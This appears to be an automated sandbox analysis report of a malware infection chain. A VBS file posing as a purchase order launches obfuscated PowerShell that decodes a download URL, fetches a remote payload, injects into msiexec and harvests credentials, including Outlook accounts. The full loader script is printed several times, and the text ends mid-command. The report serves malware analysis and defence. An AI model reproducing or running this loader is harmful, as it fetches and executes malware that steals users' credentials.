');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"3⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7zO4534C0E7\KULI500796821_PO20000003.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"3⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ohkxzoyrjhedlxin"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2332
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qbpizhjtfpwinderoya"3⤵PID:3972
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qbpizhjtfpwinderoya"3⤵PID:3056
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qbpizhjtfpwinderoya"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bvubazumtxonxrsvxjvkgc"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe TrtUnb.UapsslipC.rlFogI gtA.l(Up.$HisE ChnTa.gPaaAmilgInhETacr grEstrDdele Ne3Fil0di )Utz ');Unroots (slushiest 'Ask[ComnTitEVactEsk.As,sPr eRedr JuvEnkIAdrC raEdiaP,oroTheIAf.NOp,T EumMe a ,anI vaBalgDe e DiRF.r] Pe:Kem:Ka,s aebu C stUEneRRi iUriTso Yst P UhrJusoso.TF roU dcMisO F LIns n= Do Az [DecnforETurT In. egsGele blcsh UForR oI ToT muYsuppDurRToeo iTlokoA hc ko.irlRagtOmdy odPsoce C ] Ga:Ren:PaaT BrlUnbsCho1Unj2,la ');$Fluktueret=$skovlbernes[0];$Phoneticize=(slushiest 'Pro$FrdgAf lAneo.arbRabAAnkL re:Ra sPolKRapjV tON dL.erdpa e uNF le au=comnsilEWawW v -IndoAf BCirj tee NaCTrat Ab DetsBloyRadsVaaT M eshamsub. kunBeaEFa.Tuni.UtiwLeveLyabsy c DaLIrriIdeEc,en Z tF l ');Unroots ($Phoneticize);Unroots (slushiest 'Pr.$Plas epkEu jbefoIssl AfdstieApon drespn.TanHgyle AfaPr,d,ndedemr s sEgo[ski$IroDferiIm sGr.cNi eU yrUn n B,]M l= C $AnmARejtCont isrH risambBloustyt lkaIn,f JyhBarnFlygA kiPe g rhGaseDoedKuleTomr YansoleCits st2Tr,1Byw5 ru ');$spinny13=slushiest 'Ask$Pats akTesjBroo splTifd.aleB nn D,eEu..PreDPinoFakwAren TrlMicoKliaTrsdAttFovei CalCireCo ( a$ DrF hylsteuAn kDelt diuRatePolrGuleBootFo., o$Pans Holhari C dVagbCa aHexnAppeDes) Re ';$slidbane=$Breplansbaaden;Unroots (slushiest ' Fl$GrsG lol B ORo BKryADi lGan: hnOceEWasDAstts vUTe,RGenE VeN Pae s.ssen=Byg(Bo tJrleHers VaTD l- R p raADehtDe hkll Ta.$Wats ElLindi ynDUn,BPr,askaN sme H )Tyk ');while (!$Nedturenes) {Unroots (slushiest ',ni$ edgNonlreso.ombM na.ehlL n:Ca BHjseThes stkConrGraesljr.ursOveaBlak s slausge.=Vej$ Cot,ilrThiuBileGau ') ;Unroots $spinny13;Unroots (slushiest 'Mats ReTVina LirEsmT ki-RamsPedl esE HjE .ePAl sk 4 sl ');Unroots (slushiest 'Fal$,neGEetLBjeoFribs ras.bLsa :MolNs.mE U dWintMenuKorRproE stNEkseHarsKoa=Que(Prit paeAntsChaTM,n-strpCogA eT nthVgr I i$PyrsAmtLNo iM gd WobCraa apnAtmePu )For ') ;Unroots (slushiest ' Ba$CaugChulcanO anBFo,aKonL .n:knisMaaOFigLVe Fskardife Lsd,edsAf,=Pri$GrigUroLCenOPrebstrAB,dLcos:ForfR.frstrebisMRass Goi BrGKamELugll.vsuncE VisAcc+ a+.ar%spe$Clos ,sKBraO aV ibLsp,bCayEs.brs.mnB ue Das sa.Gl c T o.epUAn.NZygTR.m ') ;$Fluktueret=$skovlbernes[$solfreds];}$Frkrigstidernes=321286;$Feist=28101;Unroots (slushiest ' py$ Veg.malstaO roB uaE pLDig: TabValRsale.yoMBa sBloEIodskryPTriOMaeRVolsAnt Dan= se samGMisEMolt.ar- HyCFeloHann PrtMenEFu nTjrTUn, Upt$ rusReplBrei.amDji,bNonAForN OpeIvy ');Unroots (slushiest '.er$ eg CilGrno sabNemaBo,l ia:TrslRecic lcT.leUron ots L aCi bU olFo e Ov Ove=mig st[AblsRapy busZymt L,eskem Ta..ouCLano AdnR,gvGlie DerIndtAg ] el:the:JarFNa rP loColm utBAnaaBessForeca 6job4s,nsPyrtEftrBjeiP onKnsg hi(Nu $PogB AmrMi eT kmDissKwae egsFurpGa.oLaer Iss p )Ami ');Unroots (slushiest 'Vag$ BuGkajLCalo uB h aMicLcal:MonsstakshiOHineKunnGe.sPaa Uf=Cer gud[Cyss ,aYFrasUp.tN bE BiMsup. p TAireD pxUdkT er.Looe itNKalCB.soReiD ,eIunmnjazgB g]fag:Und:CitaPiesEquC api.omiU.d. slGTelE,mbTs rsEudTspiRAnaI teNal.Gbla(Org$ DkL BaI,isCMacE siNAngsUndas ib.esLUngEBef)Pr ');Unroots (slushiest 'Be $ ArgUnlLResOKimBPhoAIhulLou:T ns Bre .uasubffyrAPaaRDanEudp=Pul$ Gas OpkOpsOKraEFisnsk sMun.udssRhyUskibD ds eTLa rOmki uNhowgAlb(r.h$ Flfstar adk exRse,IsttgBess ,otsygIOveDundeCapr HanB ne frs jl, Dk$DawFMare nlIBatsUdkTDel) Ty ');Unroots $seafare;"1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tinklings Interplant Caecilia #>;$Eskimologi='Incumbence';<#Polychord seams Antistreptococcin #>;$Fordelingsnglen=$Glairin+$host.UI;function slushiest($Giganternes193){If ($Fordelingsnglen) {$Yogist++;}$Musikskole=$Loritas22+$Giganternes193.'Length'-$Yogist; for( $Gastrogastrotomy=3;$Gastrogastrotomy -lt $Musikskole;$Gastrogastrotomy+=4){$Pseudosematic++;$Menageries+=$Giganternes193[$Gastrogastrotomy];$Arteriomotor='Disendowment';}$Menageries;}function Unroots($Pilot){ & ($Fravaer) ($Pilot);}$Attributafhngighedernes215=slushiest ',leM io s z MoiRenlFodlBaraObi/Ant ';$Attributafhngighedernes215+=slushiest 'En 5inf.,ar0Tra No,( erW .diKrenGrudsovoU swBrasHus st,N FaTTa. Hin1s r0Csp.Gas0 n; ap rWDisi ysnDef6 na4 Br;Gr, Tidxg n6 To4C c;,le spr.acv,aa: bu1sav3suc1sla.In 0Unl)A t PolG oe Ovc Hokbldosol/ Af2O e0Z g1tub0Fli0Blo1Ban0sky1Ind MakFAlgi ExrUnce refDi o R xCr /siz1Tid3A t1sm .Cot0Und ';$Discern=slushiest ',beuUdksOveeAmmRMei-BakaAl.G dgEOveN .aTRn, ';$Fluktueret=slushiest 'sp hRydtEkstUnrp,ris yd:Osc/ Bl/U ogFdeePren Lga ArsTra.Un g dhrBoa/burbLigsKorq No1ple/KonMsu yU oe,aslAldo ess raP or uscsteoModmMenaPlo.st t iat Cof Ar ';$Engagerede30=slushiest '.al> sl ';$Fravaer=slushiest ' reIAddeQ.iXtsa ';$Rettighedskrav='Hundige';$Hvl='\Nonterminous.Gys';Unroots (slushiest 'Unt$T lGHabL ,iOfjoBBrnaV.rLPo : BiBHalRLone Bipf.rls maru,N B,sUndB FoaLaxa ,uDkrie ,vNAfb=Tan$ oE,ylNUn v .o:Gypa Arp BapsalDAnia F T mA He+Vet$FirhTvrv onlK.m ');Unroots (slushiest 'spy$ AdgHu.LFiloRecb cha onlOf :AigsspaKtalOKhovu blUrobkage ArRInrnDumE BesAch=til$Re,fWeslFeuUWilkdivT skuChiEhy R.hoe 